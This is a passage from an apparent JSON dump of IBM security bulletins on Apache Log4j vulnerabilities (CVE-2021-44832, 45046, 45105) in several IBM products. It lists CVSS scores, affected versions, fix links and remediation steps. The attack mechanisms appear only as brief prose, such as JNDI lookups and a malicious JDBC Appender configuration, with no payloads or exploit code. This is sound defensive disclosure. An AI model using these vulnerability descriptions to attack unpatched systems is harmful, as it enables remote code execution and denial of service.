1.4-1.6| \n\nSee [Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \$CVE-2021-45105, CVE-2021-44832\$\" )\n\nThis removes Apache Log4j from IBM Websphere Application Server. \n \n## Workarounds and Mitigations\n\n**Redhat Openshift Platform**\n\nNone.\n\n**Traditional On Premise**\n\nNone except as described in the individual on premise component security bulletins in the Remediation/Fixes table above.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTPTP\",\"label\":\"Netcool Operations Insight\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"1.6.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T10:51:19", "type": "ibm", "title": "Security Bulletin: Netcool Operations Insight is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-09T10:51:19", "id": "37EB0FBFC18EAA8CBA405BA4A0486007287891F661D591E70F8DFD893065763F", "href": "https://www.ibm.com/support/pages/node/6554808", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:21", "description": "## Summary\n\nIBM Sterling Secure Proxy is vulnerable to arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix includes Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Secure Proxy| 3.4.3.2 \nIBM Sterling Secure Proxy| 6.0.2 \nIBM Sterling Secure Proxy| 6.0.3 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product**| **VRMF**| **iFix**| **Remediation** \n---|---|---|--- \nIBM Sterling Secure Proxy| 3.4.3.2| iFix 13 Plus Build 446| [Fix Central - 3432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.2&platform=All&function=all> \"Fix Central - 3432\" ) \nIBM Sterling Secure Proxy| 6.0.2.0| iFix 04 Plus Build 232| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling Secure Proxy| 6.0.3.0| iFix 01 Plus Build 142| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \n \n \nThe [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Secure+Proxy&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) link also points to a fix called SSP-SEAS-log4j-2.17.1-jars-for-CVE-2021-44832 which supplies the jars and instructions to replace them. This fix remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2, 3.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T17:05:15", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Sterling Secure Proxy (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T17:05:15", "id": "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "href": "https://www.ibm.com/support/pages/node/6538674", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:08", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which is used by the IBM Engineering Lifecycle Management products for logging . The fix includes upgrade to Apache log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe following IBM Engineering Lifecycle Management products (IBM Jazz Team Server based Applications) are affected: Collaborative Lifecycle Management (CLM), Engineering Lifecycle Management (ELM), IBM Engineering Workflow Management (EWM), IBM Engineering Test Management (ETM), Global Configuration Management (GCM), IBM Engineering Lifecycle Optimization - Engineering Insights (ENI), IBM Engineering Systems Design Rhapsody \u2013 Model Manager(RMM), IBM Jazz Reporting Service (JRS), IBM Engineering Requirements Management DOORS Next(DNG).\n\nPlease find the affected components and remediations for each affected product and version in the table below. \n\n\n**Version(s)**| **Affected Product(s)**| **Remediation (Refer to the Step number in the Remediation Section) \n** \n---|---|--- \n6.0.6| Collaborative Lifecycle Management (CLM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | #4 \nRational DOORS Next Generation(RDNG)| | #2| | \nRational Engineering Lifecycle Manager (RELM)| | #2| | \nRational Rhapsody Model Manager (RMM)| | #2| | \nRational Quality Manager (RQM)| | #2| | \nRational Team Concert (RTC)| | #2| | \n6.0.6.1| Collaborative Lifecycle Management (CLM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | #4 \nRational DOORS Next Generation(RDNG)| | #2| | \nRational Engineering Lifecycle Manager (RELM)| | #2| | \nRational Rhapsody Model Manager (RMM)| | #2| | \nRational Quality Manager (RQM)| | #2| | \nRational Team Concert (RTC)| | #2| | \n7.0| IBM Engineering Requirements Management DOORS Next(DNG)| | #2| | \nEngineering Lifecycle Management (ELM)| | #2| | \nIBM Engineering Lifecycle Optimization - Engineering Insights (ENI)| | #2| | \nIBM Engineering Test Management (ETM)| | #2| | \nIBM Engineering Workflow Management (EWM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | \nIBM Engineering Systems Design Rhapsody - Model Manager (RMM)| | #2| | \n7.0.1| IBM Engineering Requirements Management DOORS Next(DNG)| | #2| | \nEngineering Lifecycle Management (ELM)| | #2| #3| \nIBM Engineering Lifecycle Optimization - Engineering Insights (ENI)| | #2| | \nIBM Engineering Test Management (ETM)| | #2| | \nIBM Engineering Workflow Management (EWM)| | #2| | \nGlobal Configuration Management (GCM)| | #2| | \nIBM Jazz Reporting Service (JRS)| | #2| | \nIBM Engineering Systems Design Rhapsody - Model Manager (RMM)| | #2| | \n7.0.2| Engineering Lifecycle Management (ELM)| | | #3| \nIBM Engineering Requirements Management DOORS Next(DNG)| #1| | | \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin. \n**\n\nNote: This Bulletin Supersedes Bulletin: <https://www.ibm.com/support/pages/node/6527732>\n\nNote: If you integrate any of the IBM Jazz Team Server-based products and versions (6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2) listed above with IBM WebSphere Application Server (WAS) you will want to review the IBM WebSphere Application Server (WAS) remediation [guidance](<https://www.ibm.com/support/pages/node/6538722> \"guidance\" ).\n\n1 - For **IBM Engineering Requirements Management DOORS Next (DNG)** Version 7.0.2 only. Click this [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS+Next&release=7.0.2&platform=All&function=fixId&fixids=7.0.2-IBM-ELM-iFix010&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Link\" ) to install iFix010 or newer. Note, if you have prior installed the log4j patch patch_Log4Shell_DNv4.zip you will need to remove it first. Follow the instructions in the iFix for steps on how to remove patches.\n\n2 - The Knowledge Center Component for a Locally installed Help Server (KCCI) that is (optionally) installed and configured for the following products: **Collaborative Lifecycle Management (CLM), Engineering Lifecycle Management (ELM), IBM Engineering Requirements Management DOORS Next (DOORS Next), IBM Engineering Workflow Management (EWM), IBM Engineering Test Management, Global Configuration Management (GCM), IBM Engineering Lifecycle Optimization - Engineering Insights (ENI), IBM Engineering Systems Design Rhapsody \u2013 Model Manager(RMM), IBM Jazz Reporting Service (JRS), IBM Engineering Requirements Management DOORS Next(DNG)** versions **6.0.6, 6.0.6.1,7.0, 7.0.1** will need to be updated. Follow this [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm%7ERational&product=ibm/Rational/Rational+Collaborative+Lifecycle+Management+Solution&release=All&platform=All&function=fixId&fixids=Knowledge-Center-Update-V2-CLM-ELM&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"Link\" ) and apply the Remediation\n\n3 - If the **Engineering Lifecycle Management (ELM)** optional component **mxbean-datacollection (ELMMon)** has been installed for version 7.0.1 or 7.0.2 it will need to be updated. Click This[ link ](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Lifecycle+Management&release=All&platform=All&function=fixId&fixids=MXBean-DataCollection-V2&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"link\" )and follow the instructions to remediate.\n\n4 - **IBM Jazz Reporting Service (JRS)** versions 6.0.6, 6.0.6.1 included an optional technology preview of the property graph solution (<https://jazz.net/pub/new-noteworthy/jrs/6.0.6/6.0.6/index.html#1>). This technology preview is impacted. The work around is to un-install both the Apache Cassandra - LQE Technology Preview and Elastic Search -LQE Technology Preview components of IBM Jazz Reporting Service. In IBM Installation Manager (IIM) modify packages to uninstall these components.\n\n## Workarounds and Mitigations\n\n[None](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&\\[%E2%80%A6\\]ion&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"None\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n06 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSPRJQ\",\"label\":\"IBM Engineering Lifecycle Management Base\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSR27Q\",\"label\":\"Rational Quality Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6, 6.0.6.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSJJ9R\",\"label\":\"Rational DOORS Next Generation\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6,6.0.6.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSRPNG\",\"label\":\"Global Configuration Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUVLZ\",\"label\":\"IBM Engineering Requirements Management DOORS Next\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYMRC\",\"label\":\"Rational Collaborative Lifecycle Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6-7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUC3U\",\"label\":\"IBM Engineering Workflow Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUVV6\",\"label\":\"IBM Engineering Test Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0, 7.0.1, 7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSCP65\",\"label\":\"Rational Team Concert\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"6.0.6,6.0.6.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}},{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUVLZ\",\"label\":\"IBM Engineering Requirements Management DOORS Next\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.0,7.0.1,7.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-28T19:58:40", "type": "ibm", "title": "Security Bulletin: IBM Engineering Lifecycle Management products are vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44832, CVE-2021-45046, ) and denial of service due to Apache Log4j (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-28T19:58:40", "id": "42E2A358194D10969A587E1619263DAF26CB9ED7B107D2DF24882326792073A6", "href": "https://www.ibm.com/support/pages/node/6540016", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:09", "description": "## Summary\n\nThere are Remote Attack Vulnerabilities in Apache Log4j (CVE-2021-45105, CVE-2021-45046, CVE-2021-44832) which affect the Knowledge Center Component (KCCI) which may optionally be installed by IBM Engineering Requirements Management DOORS. This fix upgrades the Knowlege Center component to a version that does not rely on or use Log4j.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Engineering Requirements Management DOORS| 9.6.1.7-9.6.1.11, 9.7-9.7.0.1, 9.7.1, 9.7.2-9.7.2.2 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by taking the actions documented in this bulletin.**\n\nNote: This security bulletin supersedes: <https://www.ibm.com/support/pages/node/6527328> \n\n\nThe Knowledge Center Component (KCCI) for a Locally installed Help Server that is (optionally) installed and configured for the following products will need to be updated: \n\n * IBM Engineering Requirements Management DOORS: 9.6.1.7 - 9.6.1.11\n * IBM Engineering Requirements Management DOORS: 9.7 - 9.7.0.1\n * IBM Engineering Requirements Management DOORS: 9.7.1\n * IBM Engineering Requirements Management DOORS: 9.7.2 - 9.7.2.2\n\n \n \n**Remediation/Fixes** \n\n\nClick the [Link](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS&release=All&platform=All&function=fixId&fixids=9.7.2.5-DOORS-fixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http&login=true> \"Link\" ) to download the patch. Follow the following procedure to remediate. \n \n\n\n \n**Procedure:**\n\n \n1\\. Download the updated IBM Engineering Requirements Management DOORS Server Windows installer \nfrom the link identified above. \n2\\. Unzip the file and install the server setup.exe on a temporary Windows machine. \n3\\. Find the updated KC_CI.zip that is apart of the temporary install \n\\- Temp Location : \n\n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\9.7.2.5\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install_ \n4\\. Next, update your existing server Windows kcii_install dir \n\n\n\\- For IBM Engineering Requirements Management DOORS **9.6.*** \n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\<version>\\Server\\ibm\\Rational\\DOORS\\9.6\\kcci_install_ \n\\- For IBM Engineering Requirements Management DOORS **9.7.*** \n_C:\\Program Files (x86)\\IBM\\Rational\\DOORS\\<version>\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install_ \n5\\. Delete the old contents of the kcci_install directory \n6\\. Copy KC_CI.zip (129 MB) version 2.0 into that directory and unzip\n\n7\\. Next click on the KCCI contents 